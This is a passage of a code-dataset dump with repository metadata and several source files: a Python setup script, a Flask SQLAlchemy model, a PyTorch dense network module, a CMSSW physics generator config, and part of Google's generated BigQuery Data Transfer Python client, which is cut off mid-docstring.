blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c48f063c4bc3a5c0a2d161e4c8f32f9de30a9ea7 | 6201900b99e76bf0720d2ba45ad39a3a0b136cf4 | /setup.py | 65e3ce4db2d2e0bcf58f2d0931fbeeb35e864bf9 | [
"MIT"
] | permissive | maxrampulla/csv_converter | 8a10f076636c0d994b50c1cb892c756ec7c9360a | 957ffa7e19bcb22ebb297908dfe7de54eb537e65 | refs/heads/master | 2022-12-03T10:07:08.353260 | 2020-07-29T04:56:08 | 2020-07-29T04:56:08 | 283,401,205 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | from setuptools import setup
with open("README") as f:
long_description = f.read()
setup(
name="csv_converter",
version="1.1.0",
description="Converts a list of hotels from a csv into a json wich is \
readable by the conversion tool",
license="MIT",
long_description=long_description,
author="Maximillian Rampulla",
author_email="maxrampulla@gmail.com",
py_modules=["csv_converter"]
)
| [
"maxrampulla@gmail.com"
] | maxrampulla@gmail.com |
50d9ae26533b305f7ae636f2adb0acc5a98ec2d5 | c0e1ee153d3865273e964e4d58df87ce95b4dc6a | /taas/database.py | 42c490fb3aac98ab70be4a5ff3356d43818af8aa | [] | no_license | cjoelrun/taas | 4d1c72adc3a62f6c5297d59b588e5543230f1d04 | 8ce4755347742890b4cf845a9763a39427e115ab | refs/heads/master | 2020-12-03T04:17:13.312453 | 2017-11-17T06:43:15 | 2017-11-21T15:17:13 | 95,846,032 | 1 | 2 | null | 2017-11-21T15:17:14 | 2017-06-30T03:47:37 | Python | UTF-8 | Python | false | false | 108 | py | from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class Model(db.Model):
__abstract__ = True
| [
"cameronjlopez@gmail.com"
] | cameronjlopez@gmail.com |
8c3bbd0d1562d534c37dbac04d12ed97dded0f26 | 7b0f394f3c6d40c60124848f702a2320b8718a5b | /models/dense.py | 71a09ca432a3b1fff5e69532d39a8049ee320270 | [] | no_license | Braamling/Human-Saliency-on-Snapshots-in-Web-Relevance | 1217bbe3d0917a537752634a07009ee6f1273f1a | 83121ad916c1dfbffe8b58b017cc2f8812ed387a | refs/heads/master | 2023-01-09T12:58:16.419448 | 2019-03-20T14:02:24 | 2019-03-20T14:02:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,237 | py | import math
import torch.nn as nn
class Dense(nn.Module):
def _create_layers(self, input_size, hidden_layers, output_size, dropout):
hidden_sizes = [input_size] + [int(x) for x in hidden_layers.split('x')] + [output_size]
n_hidden_units = len(hidden_sizes)
layers = []
for i in range(n_hidden_units - 1):
layers.append(nn.Linear(hidden_sizes[i], hidden_sizes[i + 1]))
if i < n_hidden_units - 2:
layers += [nn.ReLU(True), nn.Dropout(dropout)] # TODO should this dropout be configurable?
return layers
def forward(self, x):
x = self.classifier(x)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
| [
"bram.vandenakker@shopify.com"
] | bram.vandenakker@shopify.com |
f3d418ba7b2ed16b3f1ce2232e890d71bc821c23 | 44a2741832c8ca67c8e42c17a82dbe23a283428d | /cmssw/JewelInterface/test/testJewel.py | 071c1e3250d6e8df3a5a67cef29974543a8e63aa | [] | no_license | yenjie/HIGenerator | 9ff00b3f98b245f375fbd1b565560fba50749344 | 28622c10395af795b2b5b1fecf42e9f6d4e26f2a | refs/heads/master | 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("ANA")
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
process.load("Configuration.StandardSequences.Services_cff")
process.load("GeneratorInterface.HydjetInterface.hydjetDefault_cfi")
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(10000)
)
process.source = cms.Source("EmptySource")
process.load("Configuration.Generator.PythiaUESettings_cfi");
process.generator = cms.EDFilter("JewelGeneratorFilter",
frame = cms.string('CMS '),
targ = cms.string('P '),
izp = cms.int32(82),
bMin = cms.double(0),
izt = cms.int32(1),
proj = cms.string('A '),
comEnergy = cms.double(2760.0),
iat = cms.int32(1),
bMax = cms.double(15),
iap = cms.int32(208),
rotateEventPlane = cms.bool(True),
PythiaParameters = cms.PSet(
process.pythiaUESettingsBlock,
processParameters = cms.vstring('MSEL=1 ! QCD hight pT processes',
'CKIN(3)=80. ! minimum pt hat for hard interactions',
'CKIN(4)=9990. ! maximum pt hat for hard interactions'),
# This is a vector of ParameterSet names to be read, in this order
parameterSets = cms.vstring('pythiaUESettings',
'processParameters')
)
)
process.RandomNumberGeneratorService.generator.initialSeed = 5
process.SimpleMemoryCheck = cms.Service('SimpleMemoryCheck',
ignoreTotal=cms.untracked.int32(0),
oncePerEventMode = cms.untracked.bool(False)
)
process.ana = cms.EDAnalyzer('HydjetAnalyzer'
)
process.TFileService = cms.Service('TFileService',
fileName = cms.string('treefileR6.root')
)
process.p1 = cms.Path(process.generator)
process.p2 = cms.Path(process.ana)
| [
"yenjie@mit.edu"
] | yenjie@mit.edu |
9a238b0185bf6213d1f9063ef2ef9368130210a2 | e7a0a6a73b4dbddcc75fa428488d50cd2b7cb976 | /google/cloud/bigquery_datatransfer_v1/services/data_transfer_service/client.py | 8bf606e4905b67ef5cf5a3fe497fd16de7f07b02 | [
"Apache-2.0"
] | permissive | gopinath678/python-bigquery-datatransfer | e014e236cdb4e272b4644181bb4a50a87d19e1a2 | 34f506e81cbbbc3485a4e8a9cff87df82b3d6756 | refs/heads/master | 2023-03-22T19:36:31.574412 | 2021-03-10T20:42:39 | 2021-03-10T20:42:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,755 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.bigquery_datatransfer_v1.services.data_transfer_service import pagers
from google.cloud.bigquery_datatransfer_v1.types import datatransfer
from google.cloud.bigquery_datatransfer_v1.types import transfer
from google.protobuf import duration_pb2 as duration # type: ignore
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
from google.protobuf import struct_pb2 as struct # type: ignore
from google.protobuf import timestamp_pb2 as timestamp # type: ignore
from google.rpc import status_pb2 as status # type: ignore
from .transports.base import DataTransferServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import DataTransferServiceGrpcTransport
from .transports.grpc_asyncio import DataTransferServiceGrpcAsyncIOTransport
class DataTransferServiceClientMeta(type):
"""Metaclass for the DataTransferService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[DataTransferServiceTransport]]
_transport_registry["grpc"] = DataTransferServiceGrpcTransport
_transport_registry["grpc_asyncio"] = DataTransferServiceGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[DataTransferServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class DataTransferServiceClient(metaclass=DataTransferServiceClientMeta):
"""The Google BigQuery Data Transfer Service API enables
BigQuery users to configure the transfer of their data from
other Google Products into BigQuery. This service contains
methods that are end user exposed. It backs up the frontend.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "bigquerydatatransfer.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataTransferServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataTransferServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> DataTransferServiceTransport:
"""Return the transport used by the client instance.
Returns:
DataTransferServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def data_source_path(project: str, data_source: str,) -> str:
"""Return a fully-qualified data_source string."""
return "projects/{project}/dataSources/{data_source}".format(
project=project, data_source=data_source,
)
@staticmethod
def parse_data_source_path(path: str) -> Dict[str, str]:
"""Parse a data_source path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/dataSources/(?P<data_source>.+?)$", path
)
return m.groupdict() if m else {}
@staticmethod
def run_path(project: str, transfer_config: str, run: str,) -> str:
"""Return a fully-qualified run string."""
return "projects/{project}/transferConfigs/{transfer_config}/runs/{run}".format(
project=project, transfer_config=transfer_config, run=run,
)
@staticmethod
def parse_run_path(path: str) -> Dict[str, str]:
"""Parse a run path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/transferConfigs/(?P<transfer_config>.+?)/runs/(?P<run>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def transfer_config_path(project: str, transfer_config: str,) -> str:
"""Return a fully-qualified transfer_config string."""
return "projects/{project}/transferConfigs/{transfer_config}".format(
project=project, transfer_config=transfer_config,
)
@staticmethod
def parse_transfer_config_path(path: str) -> Dict[str, str]:
"""Parse a transfer_config path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/transferConfigs/(?P<transfer_config>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[credentials.Credentials] = None,
transport: Union[str, DataTransferServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the data transfer service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, DataTransferServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = (
self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
)
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, DataTransferServiceTransport):
# transport is a DataTransferServiceTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, "
"provide its scopes directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
ssl_channel_credentials=ssl_credentials,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
def get_data_source(
self,
request: datatransfer.GetDataSourceRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datatransfer.DataSource:
r"""Retrieves a supported data source and returns its
settings, which can be used for UI rendering.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.GetDataSourceRequest):
The request object. A request to get data source info.
name (str):
Required. The field will contain name of the resource
requested, for example:
``projects/{project_id}/dataSources/{data_source_id}``
or
``projects/{project_id}/locations/{location_id}/dataSources/{data_source_id}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.DataSource:
Represents data source metadata.
Metadata is sufficient to render UI and
request proper OAuth tokens.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.GetDataSourceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.GetDataSourceRequest):
request = datatransfer.GetDataSourceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_data_source]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_data_sources(
self,
request: datatransfer.ListDataSourcesRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListDataSourcesPager:
r"""Lists supported data sources and returns their
settings, which can be used for UI rendering.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ListDataSourcesRequest):
The request object. Request to list supported data
sources and their data transfer settings.
parent (str):
Required. The BigQuery project id for which data sources
should be returned. Must be in the form:
``projects/{project_id}`` or
\`projects/{project_id}/locations/{location_id}
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.services.data_transfer_service.pagers.ListDataSourcesPager:
Returns list of supported data
sources and their metadata.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ListDataSourcesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ListDataSourcesRequest):
request = datatransfer.ListDataSourcesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_data_sources]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListDataSourcesPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def create_transfer_config(
self,
request: datatransfer.CreateTransferConfigRequest = None,
*,
parent: str = None,
transfer_config: transfer.TransferConfig = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> transfer.TransferConfig:
r"""Creates a new data transfer configuration.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.CreateTransferConfigRequest):
The request object. A request to create a data transfer
configuration. If new credentials are needed for this
transfer configuration, an authorization code must be
provided. If an authorization code is provided, the
transfer configuration will be associated with the user
id corresponding to the authorization code. Otherwise,
the transfer configuration will be associated with the
calling user.
parent (str):
Required. The BigQuery project id where the transfer
configuration should be created. Must be in the format
projects/{project_id}/locations/{location_id} or
projects/{project_id}. If specified location and
location of the destination bigquery dataset do not
match - the request will fail.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transfer_config (google.cloud.bigquery_datatransfer_v1.types.TransferConfig):
Required. Data transfer configuration
to create.
This corresponds to the ``transfer_config`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.TransferConfig:
Represents a data transfer configuration. A transfer configuration
contains all metadata needed to perform a data
transfer. For example, destination_dataset_id
specifies where data should be stored. When a new
transfer configuration is created, the specified
destination_dataset_id is created when needed and
shared with the appropriate data source service
account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, transfer_config])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.CreateTransferConfigRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.CreateTransferConfigRequest):
request = datatransfer.CreateTransferConfigRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if transfer_config is not None:
request.transfer_config = transfer_config
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_transfer_config]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def update_transfer_config(
self,
request: datatransfer.UpdateTransferConfigRequest = None,
*,
transfer_config: transfer.TransferConfig = None,
update_mask: field_mask.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> transfer.TransferConfig:
r"""Updates a data transfer configuration.
All fields must be set, even if they are not updated.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.UpdateTransferConfigRequest):
The request object. A request to update a transfer
configuration. To update the user id of the transfer
configuration, an authorization code needs to be
provided.
transfer_config (google.cloud.bigquery_datatransfer_v1.types.TransferConfig):
Required. Data transfer configuration
to create.
This corresponds to the ``transfer_config`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Required list of fields to
be updated in this request.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.TransferConfig:
Represents a data transfer configuration. A transfer configuration
contains all metadata needed to perform a data
transfer. For example, destination_dataset_id
specifies where data should be stored. When a new
transfer configuration is created, the specified
destination_dataset_id is created when needed and
shared with the appropriate data source service
account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([transfer_config, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.UpdateTransferConfigRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.UpdateTransferConfigRequest):
request = datatransfer.UpdateTransferConfigRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if transfer_config is not None:
request.transfer_config = transfer_config
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_transfer_config]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("transfer_config.name", request.transfer_config.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def delete_transfer_config(
self,
request: datatransfer.DeleteTransferConfigRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a data transfer configuration,
including any associated transfer runs and logs.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.DeleteTransferConfigRequest):
The request object. A request to delete data transfer
information. All associated transfer runs and log
messages will be deleted as well.
name (str):
Required. The field will contain name of the resource
requested, for example:
``projects/{project_id}/transferConfigs/{config_id}`` or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.DeleteTransferConfigRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.DeleteTransferConfigRequest):
request = datatransfer.DeleteTransferConfigRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_transfer_config]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
def get_transfer_config(
self,
request: datatransfer.GetTransferConfigRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> transfer.TransferConfig:
r"""Returns information about a data transfer config.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.GetTransferConfigRequest):
The request object. A request to get data transfer
information.
name (str):
Required. The field will contain name of the resource
requested, for example:
``projects/{project_id}/transferConfigs/{config_id}`` or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.TransferConfig:
Represents a data transfer configuration. A transfer configuration
contains all metadata needed to perform a data
transfer. For example, destination_dataset_id
